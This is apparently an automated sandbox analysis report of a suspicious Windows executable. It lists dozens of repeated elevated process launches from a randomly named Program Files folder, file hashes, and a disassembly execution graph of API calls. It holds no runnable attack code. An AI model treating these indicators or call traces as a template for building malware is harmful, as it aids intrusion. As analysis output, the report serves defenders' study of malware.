                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:14
                                                                Start time:03:04:51
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:15
                                                                Start time:03:04:51
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:16
                                                                Start time:03:04:51
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:17
                                                                Start time:03:04:51
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:18
                                                                Start time:03:04:51
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:19
                                                                Start time:03:04:52
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:20
                                                                Start time:03:04:52
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:21
                                                                Start time:03:04:52
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:22
                                                                Start time:03:04:52
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:23
                                                                Start time:03:04:53
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:24
                                                                Start time:03:04:53
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3408 CREDAT:275457 /prefetch:2
                                                                Imagebase:0x880000
                                                                File size:815'304 bytes
                                                                MD5 hash:8A590F790A98F3D77399BE457E01386A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:25
                                                                Start time:03:04:54
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:26
                                                                Start time:03:04:54
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:27
                                                                Start time:03:04:54
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:29
                                                                Start time:03:04:54
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:30
                                                                Start time:03:04:54
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:31
                                                                Start time:03:04:55
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:32
                                                                Start time:03:04:55
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:33
                                                                Start time:03:04:55
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:34
                                                                Start time:03:04:55
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:35
                                                                Start time:03:04:55
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:36
                                                                Start time:03:04:55
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:37
                                                                Start time:03:04:55
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:38
                                                                Start time:03:04:56
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:39
                                                                Start time:03:04:56
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:40
                                                                Start time:03:04:56
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:41
                                                                Start time:03:04:56
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                General

                                                                Target ID:42
                                                                Start time:03:04:56
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Has exited:false

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:15.5%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:9.6%
                                                                  Total number of Nodes:1339
                                                                  Total number of Limit Nodes:20
                                                                  execution_graph 5120 6094e0 5121 6094bc 5120->5121 5122 603a10 11 API calls 5121->5122 5123 6094cc 5122->5123 5124 6044b4 13 API calls 5123->5124 5125 6094da 5124->5125 5126 6072e2 5127 6072e4 5126->5127 5128 6064bc 56 API calls 5127->5128 5129 60731d 5128->5129 5130 603a40 25 API calls 5129->5130 5131 607328 5130->5131 5132 6039ec 11 API calls 5131->5132 5133 60733d 5132->5133 5134 6034e6 5135 6034e8 5134->5135 5136 602920 7 API calls 5135->5136 5137 603584 5136->5137 5138 603ee6 5139 603ee8 5138->5139 5140 603f04 5139->5140 5141 603ef6 SysFreeString 5139->5141 5141->5140 5639 602fe8 5640 602ff2 5639->5640 5641 602880 25 API calls 5640->5641 5642 602ff7 5641->5642 5158 6038ec 5159 6038f0 5158->5159 5160 603868 5 API calls 5159->5160 5161 603932 5159->5161 5160->5161 5162 60397e FreeLibrary 5161->5162 5165 603984 5161->5165 5162->5165 5163 6039bc 5164 6039b1 ExitProcess 5165->5163 5165->5164 4984 60646e 4986 606470 4984->4986 4985 6064a0 4986->4985 4987 6060f8 56 API calls 4986->4987 4987->4985 5643 6075ee 5644 6075f0 5643->5644 5647 607534 5644->5647 5646 6075f8 5648 607569 5647->5648 5649 60755d 5647->5649 5650 607567 5648->5650 5651 604b70 56 API calls 5648->5651 5652 603a84 11 API calls 5649->5652 5653 604b70 56 API calls 5650->5653 5651->5650 5652->5650 5654 6075a1 5653->5654 5655 6072e4 56 API calls 5654->5655 5656 6075b0 5655->5656 5657 6039ec 11 API calls 5656->5657 5658 6075c7 5657->5658 5659 6039ec 11 API calls 5658->5659 5660 6075cf 5659->5660 5660->5646 4257 6098f0 4264 604e28 GetModuleHandleA 4257->4264 4265 604e5b 4264->4265 4321 603750 4265->4321 4268 6087f8 4269 608800 4268->4269 4269->4269 4556 608a50 GetPEB 4269->4556 4271 60881d 4272 608826 4271->4272 4557 608a6c GetPEB 4271->4557 4558 608dd8 4272->4558 4277 60883e 4278 6039ec 11 API calls 4277->4278 4279 608850 4278->4279 4571 609624 4279->4571 4282 609624 27 API calls 4283 608874 4282->4283 4284 609624 27 API calls 4283->4284 4285 608886 4284->4285 4606 603a40 4285->4606 4289 6088d2 4290 609624 27 API calls 4289->4290 4292 6088e4 4290->4292 4294 605e3c 56 API calls 4292->4294 4293 60889b 4293->4289 4295 609624 27 API calls 4293->4295 4717 605d50 4293->4717 4721 603c68 4293->4721 4309 6088ec 4294->4309 4295->4293 4296 60899f 4735 6044b4 4296->4735 4304 608cb8 25 API calls 4304->4309 4305 603a84 11 API calls 4305->4309 4306 605e3c 56 API calls 4306->4309 4309->4296 4309->4304 4309->4305 4309->4306 4616 608a88 4309->4616 4632 608b94 4309->4632 4641 608c1c 4309->4641 4650 608eb4 4309->4650 4658 609014 4309->4658 4311 6038f4 4312 603909 4311->4312 4313 603928 4312->4313 4316 603939 4312->4316 4969 603868 4313->4969 4315 603932 4315->4316 4317 60397e FreeLibrary 4316->4317 4320 603984 4316->4320 4317->4320 4318 6039bc 4319 6039b1 ExitProcess 4320->4318 4320->4319 4322 603783 4321->4322 4325 6036e0 4322->4325 4326 6036f5 4325->4326 4327 60372b 4325->4327 4326->4327 4331 602880 4326->4331 4337 604524 4326->4337 4341 604b70 4326->4341 4327->4268 4332 602888 4331->4332 4333 6028a0 4331->4333 4347 60222c 4332->4347 4333->4326 4334 602890 4334->4333 4358 602978 4334->4358 4338 604534 GetModuleFileNameA 4337->4338 4339 604550 4337->4339 4495 6047b8 GetModuleFileNameA RegOpenKeyExA 4338->4495 4339->4326 4342 604b81 4341->4342 4343 604bb2 4341->4343 4342->4343 4534 60456c 4342->4534 4343->4326 4348 602243 4347->4348 4349 60223e 4347->4349 4351 602270 RtlEnterCriticalSection 4348->4351 4352 60227a 4348->4352 4357 60224f 4348->4357 4364 6019d0 RtlInitializeCriticalSection 4349->4364 4351->4352 4352->4357 4371 6020e4 4352->4371 4355 6023c7 4355->4334 4356 6023bd RtlLeaveCriticalSection 4356->4355 4357->4334 4360 60292c 4358->4360 4359 602951 4482 602920 4359->4482 4360->4359 4474 604ddc 4360->4474 4365 6019f5 RtlEnterCriticalSection 4364->4365 4366 6019ff 4364->4366 4365->4366 4367 601a1d LocalAlloc 4366->4367 4368 601a37 4367->4368 4369 601a97 4368->4369 4370 601a8d RtlLeaveCriticalSection 4368->4370 4369->4348 4370->4369 4374 6020fb 4371->4374 4372 60213c 4376 602163 4372->4376 4382 601e7c 4372->4382 4374->4372 4374->4376 4377 60204c 4374->4377 4376->4355 4376->4356 4386 601750 4377->4386 4380 602069 4380->4374 4383 601f17 4382->4383 4385 601ea1 4382->4385 4383->4385 4438 601dc0 4383->4438 4385->4376 4390 60176e 4386->4390 4388 60177c 4411 6015d4 4388->4411 4390->4388 4391 6017ea 4390->4391 4394 6017dc 4390->4394 4403 601430 4390->4403 4415 6012e4 4390->4415 4391->4380 4396 601fc0 4391->4396 4393 60178a 4393->4391 4419 60150c 4394->4419 4426 601f74 4396->4426 4399 6012e4 LocalAlloc 4400 601fe4 4399->4400 4402 601fec 4400->4402 4430 601c80 4400->4430 4402->4380 4404 60143f VirtualAlloc 4403->4404 4406 60146c 4404->4406 4407 60148f 4404->4407 4423 601254 4406->4423 4407->4390 4410 60147c VirtualFree 4410->4407 4413 601627 4411->4413 4412 601676 4412->4393 4413->4412 4414 60165d VirtualAlloc 4413->4414 4414->4412 4414->4413 4416 6012ff 4415->4416 4417 601254 LocalAlloc 4416->4417 4418 60135a 4417->4418 4418->4390 4422 60153a 4419->4422 4420 6015ae 4420->4391 4421 601578 VirtualFree 4421->4422 4422->4420 4422->4421 4424 6011c8 LocalAlloc 4423->4424 4425 601262 4424->4425 4425->4407 4425->4410 4427 601f86 4426->4427 4428 601f7d 4426->4428 4427->4399 4428->4427 4435 601cbc 4428->4435 4431 601c92 4430->4431 4432 601ca5 4430->4432 4433 601e7c 9 API calls 4431->4433 4432->4402 4434 601ca2 4433->4434 4434->4402 4436 6023d8 9 API calls 4435->4436 4437 601cdd 4436->4437 4437->4427 4440 601dd4 4438->4440 4439 601e70 4439->4385 4440->4439 4441 601e22 4440->4441 4442 601e0c 4440->4442 4444 60193c 3 API calls 4441->4444 4451 60193c 4442->4451 4445 601e20 4444->4445 4445->4439 4446 601c80 9 API calls 4445->4446 4447 601e43 4446->4447 4448 601e65 4447->4448 4461 601ce0 4447->4461 4466 60136c 4448->4466 4452 601966 4451->4452 4460 6019c3 4451->4460 4470 601694 4452->4470 4455 6012e4 LocalAlloc 4456 601987 4455->4456 4457 60150c VirtualFree 4456->4457 4458 60199e 4456->4458 4457->4458 4459 60136c LocalAlloc 4458->4459 4458->4460 4459->4460 4460->4445 4462 601ce5 4461->4462 4464 601cf3 4461->4464 4463 601cbc 9 API calls 4462->4463 4465 601cf2 4463->4465 4464->4448 4465->4448 4467 60137e 4466->4467 4468 6013a1 4467->4468 4469 601254 LocalAlloc 4467->4469 4468->4439 4469->4468 4472 6016e5 4470->4472 4471 601746 4471->4455 4472->4471 4473 601717 VirtualFree 4472->4473 4473->4472 4475 604e11 TlsGetValue 4474->4475 4476 604deb 4474->4476 4477 604df6 4475->4477 4478 604e1b 4475->4478 4476->4359 4485 604d98 4477->4485 4478->4359 4480 604dfb TlsGetValue 4481 604e0a 4480->4481 4481->4359 4492 6039d4 4482->4492 4486 604d9e 4485->4486 4489 604dc2 4486->4489 4491 604d84 LocalAlloc 4486->4491 4488 604dbe 4488->4489 4490 604dce TlsSetValue 4488->4490 4489->4480 4490->4489 4491->4488 4493 6038f4 7 API calls 4492->4493 4494 60292b 4493->4494 4494->4333 4496 60483a 4495->4496 4497 6047fa RegOpenKeyExA 4495->4497 4513 6045e0 GetModuleHandleA 4496->4513 4497->4496 4498 604818 RegOpenKeyExA 4497->4498 4498->4496 4500 6048c3 lstrcpyn GetThreadLocale GetLocaleInfoA 4498->4500 4502 6049f3 4500->4502 4503 6048fa 4500->4503 4502->4339 4503->4502 4506 60490a lstrlen 4503->4506 4504 60489d RegCloseKey 4504->4339 4505 60487f RegQueryValueExA 4505->4504 4508 604923 4506->4508 4508->4502 4509 604951 lstrcpyn LoadLibraryExA 4508->4509 4510 60497d 4508->4510 4509->4510 4510->4502 4511 604987 lstrcpyn LoadLibraryExA 4510->4511 4511->4502 4512 6049bd lstrcpyn LoadLibraryExA 4511->4512 4512->4502 4514 604608 GetProcAddress 4513->4514 4515 60464c 4513->4515 4514->4515 4516 